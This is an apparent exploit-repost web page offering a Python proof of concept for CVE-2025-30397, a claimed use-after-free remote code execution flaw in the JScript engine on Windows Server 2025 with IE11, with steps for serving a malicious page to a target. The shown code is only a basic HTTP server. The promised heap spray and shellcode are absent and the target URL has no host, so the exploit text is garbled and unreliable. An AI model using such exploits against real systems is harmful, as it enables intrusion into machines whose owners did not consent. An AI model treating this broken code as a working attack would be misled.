Hacking

Microsoft Windows Server 2025 JScript Engine – Remote Code Execution (RCE)

Author1 week ago03 mins

#!/usr/bin/env python3
# Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) 
# Exploit Author: Mohammed Idrees Banyamer
# Instagram: @@banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# CVE: CVE-2025-30397
# Vendor: Microsoft
# Affected Versions: Windows Server 2025 (build 25398 and prior)
# Tested on: Windows Server 2025 + IE11 (x86)
# Type: Remote
# Platform: Windows
# Vulnerability Type: Use-After-Free (JScript Engine)
# Description: This PoC exploits a Use-After-Free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution.

# ============================
#  Usage Instructions:
#
# 1. Save this script as `exploit_server.py`.
# 2. Run it with Python 3:
#    $ python3 exploit_server.py
# 3. On the vulnerable target (Windows Server 2025 + IE11):
#    Open Internet Explorer and navigate to:
#    http://:8080/poc_cve_2025_30397.html
#
# If the target is vulnerable, calc.exe will be executed.
# ============================

import http.server
import socketserver

PORT = 8080

HTML_CONTENT = b"""


  
  PoC - CVE-2025-30397
  


  
  Author: Mohammed Idrees Banyamer
  Instagram: @banyamer_security
  GitHub: mbanyamer
  This demonstration is for ethical testing only. Triggering the vulnerability on vulnerable Internet Explorer installations will lead to execution of calc.exe via shellcode.


"""

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/' or self.path == '/poc_cve_2025_30397.html':
            self.send_response(200)
            self.send_header("Content-type", "text/html")
            self.send_header("Content-length", str(len(HTML_CONTENT)))
            self.send_header("X-Content-Type-Options", "nosniff")
            self.send_header("X-Frame-Options", "SAMEORIGIN")
            self.send_header("Content-Security-Policy", "default-src 'self'")
            self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
            self.send_header("Pragma", "no-cache")
            self.send_header("Expires", "0")
            self.end_headers()
            self.wfile.write(HTML_CONTENT)
        else:
            self.send_error(404, "File Not Found")

def run():
    print(f"Serving PoC on http://0.0.0.0:{PORT}/poc_cve_2025_30397.html")
    with socketserver.TCPServer(("", PORT), Handler) as httpd:
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            print("\nServer stopped.")

if __name__ == "__main__":
    run()

Leave a Reply Cancel reply

Related News

Parrot and DJI variants Drone OSes – Kernel Panic Exploit

Author34 minutes ago 0

Windows 11 SMB Client – Privilege Escalation & Remote Code Execution (RCE)

Author3 hours ago 0

Anchor CMS 0.12.7 – Stored Cross Site Scripting (XSS)

Author4 hours ago 0

Litespeed Cache WordPress Plugin 6.3.0.1 – Privilege Escalation

Author7 hours ago 0